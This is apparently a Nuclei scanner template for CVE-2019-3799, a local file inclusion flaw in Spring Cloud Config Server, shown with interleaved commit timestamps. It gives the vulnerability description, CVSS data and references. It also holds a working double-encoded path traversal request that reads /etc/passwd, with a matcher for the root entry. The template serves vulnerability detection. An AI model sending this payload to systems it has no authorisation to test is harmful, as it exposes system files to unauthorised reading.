2021-01-02 04:59:06 +00:00
id : CVE-2019-3799
2022-04-22 10:38:41 +00:00
2020-06-22 13:35:37 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Spring Cloud Config Server - Local File Inclusion
2020-06-22 13:35:37 +00:00
author : madrobot
2021-09-10 11:26:40 +00:00
severity : medium
2022-07-26 13:45:11 +00:00
description : Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches.
2021-08-18 11:37:49 +00:00
reference :
2021-03-30 12:10:17 +00:00
- https://github.com/mpgn/CVE-2019-3799
- https://pivotal.io/security/cve-2019-3799
2022-05-17 09:18:12 +00:00
- https://www.oracle.com/security-alerts/cpuapr2022.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-3799
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-3799
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.0237
2023-10-16 10:55:14 +00:00
epss-percentile : 0.886
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : vmware
product : spring_cloud_config
tags : cve,cve2019,lfi
2020-06-22 13:35:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-06-22 13:35:37 +00:00
- method : GET
path :
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-22 13:35:37 +00:00
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-06-22 13:35:37 +00:00
regex :
2021-07-24 21:35:55 +00:00
- 'root:.*:0:0:'
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200